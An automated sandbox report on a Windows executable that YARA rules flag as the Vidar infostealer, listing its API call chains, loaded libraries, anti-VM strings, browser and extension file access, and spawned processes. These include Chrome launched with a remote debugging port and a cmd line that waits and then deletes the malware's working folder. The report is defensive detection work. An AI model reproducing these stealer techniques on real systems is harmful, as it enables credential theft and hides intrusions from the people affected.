          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: String function: 0040F5B0 appears 135 times
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, type: SAMPLEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
          Source: 1.2.SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
          Source: 1.0.SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/16@4/5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00411250 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,1_2_00411250
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\6P7UCZ98.htmJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_03
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: ozcb1d2no.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeVirustotal: Detection: 65%
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeReversingLabs: Detection: 57%
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2220,i,9774722909908192130,17750005277753749404,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2160 /prefetch:3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9h4wb" & exit
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9h4wb" & exitJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2220,i,9774722909908192130,17750005277753749404,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2160 /prefetch:3Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004108E0
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004108E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeEvasive API call chain: GetSystemTime,DecisionNodes
          Source: C:\Windows\SysWOW64\timeout.exe TID: 4704Thread sleep count: 100 > 30Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00414E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,1_2_00414E70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00407210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,1_2_00407210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose,1_2_0040B6B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00415EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,1_2_00415EB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00408360 FindFirstFileA,CopyFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindClose,1_2_00408360
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00413FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,1_2_00413FD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004013F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose,1_2_004013F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00413580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindClose,1_2_00413580
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004097B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,1_2_004097B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040ACD0 wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,lstrlenA,DeleteFileA,CopyFileA,FindClose,1_2_0040ACD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00408C90 lstrcpyA,lstrcatA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,FindClose,DeleteFileA,_invalid_parameter_noinfo_noreturn,1_2_00408C90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00414950 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414950
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00409560 ??2@YAPAXI@Z,??2@YAPAXI@Z,_invalid_parameter_noinfo_noreturn,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,1_2_00409560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00413AF0 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,1_2_00413AF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040FDD0 GetSystemInfo,wsprintfA,1_2_0040FDD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&00000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004108E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040FA70 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,1_2_0040FA70

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Searches for specific processes (likely to inject)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00411250 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,1_2_00411250
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00411310 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,1_2_00411310
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9h4wb" & exitJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,1_2_0040FC20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0041BAA0 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,1_2_0041BAA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00417210 EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,1_2_00417210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040FBC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
